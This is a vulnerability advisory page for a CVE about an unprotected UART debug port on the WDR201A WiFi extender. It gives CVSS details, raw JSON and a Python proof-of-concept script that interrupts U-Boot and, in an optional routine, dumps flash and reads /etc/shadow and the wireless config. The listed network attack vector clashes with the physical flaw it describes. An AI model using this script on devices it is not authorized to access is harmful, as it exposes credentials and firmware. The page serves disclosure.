Security Vulnerability Report
CVE-2026-30704 CVSS 9.1 CRITICAL

CVE-2026-30704

Published: 2026-03-18 18:16:28
Last Modified: 2026-03-19 15:16:27

Description

The WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02) exposes an unprotected UART interface through accessible hardware pads on the PCB.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

No configuration data available.

WiFi Extender WDR201A Hardware Version V2.1
WiFi Extender WDR201A Firmware Version LFMZX28040922V1.02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-30704 UART Access PoC
# Hardware Requirements: USB-to-TTL adapter (FTDI/CH340), jumper wires
# Connection: TX->RX, RX->TX, GND->GND

import serial
import time

# UART Configuration for WDR201A
UART_CONFIG = {
    'port': '/dev/ttyUSB0',  # Adjust based on your system
    'baudrate': 115200,
    'bytesize': serial.EIGHTBITS,
    'parity': serial.PARITY_NONE,
    'stopbits': serial.STOPBITS_ONE,
    'timeout': 1
}


def connect_uart():
    """Establish UART connection to WDR201A device"""
    try:
        ser = serial.Serial(**UART_CONFIG)
        print(f"[*] Connected to {UART_CONFIG['port']}")
        print(f"[*] Baudrate: {UART_CONFIG['baudrate']}")
        return ser
    except serial.SerialException as e:
        print(f"[!] Connection failed: {e}")
        return None


def interact_with_uart(ser):
    """Interact with UART shell"""
    print("[*] Waiting for boot messages...")
    time.sleep(3)

    # Read boot output
    while ser.in_waiting:
        char = ser.read(1).decode('utf-8', errors='ignore')
        print(char, end='')

    # Send break to enter U-Boot (press Ctrl+C during boot)
    print("\n[*] Attempting to interrupt boot process...")
    ser.send_break()
    time.sleep(0.5)

    # Clear buffer
    while ser.in_waiting:
        ser.read(ser.in_waiting)

    # Try common U-Boot commands
    commands = ['help', 'printenv', 'setenv', 'boot']
    for cmd in commands:
        ser.write(f"{cmd}\n".encode())
        time.sleep(0.5)
        while ser.in_waiting:
            char = ser.read(1).decode('utf-8', errors='ignore')
            print(char, end='')


def extract_firmware(ser):
    """Attempt to extract firmware via UART"""
    # Common commands to extract firmware
    cmds = [
        'cat /proc/mtd',
        'cat /dev/mtdblock0 > /tmp/firmware.bin',
        'cat /etc/config/wireless',
        'cat /etc/shadow',
        'strings /dev/mtdblock0'
    ]
    for cmd in cmds:
        print(f"\n[*] Executing: {cmd}")
        ser.write(f"{cmd}\n".encode())
        time.sleep(2)
        while ser.in_waiting:
            char = ser.read(1).decode('utf-8', errors='ignore')
            print(char, end='')


if __name__ == '__main__':
    ser = connect_uart()
    if ser:
        interact_with_uart(ser)
        # Uncomment to attempt firmware extraction
        # extract_firmware(ser)
        ser.close()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30704", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:28.077", "lastModified": "2026-03-19T15:16:26.580", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02) exposes an unprotected UART interface through accessible hardware pads on the PCB"}, {"lang": "es", "value": "El extensor WiFi WDR201A (HW V2.1, FW LFMZX28040922V1.02) expone una interfaz UART desprotegida a través de pads de hardware accesibles en la PCB."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-912"}]}], "references": [{"url": "https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html", "source": "[email protected]"}, {"url": "https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China", "source": "[email protected]"}]}}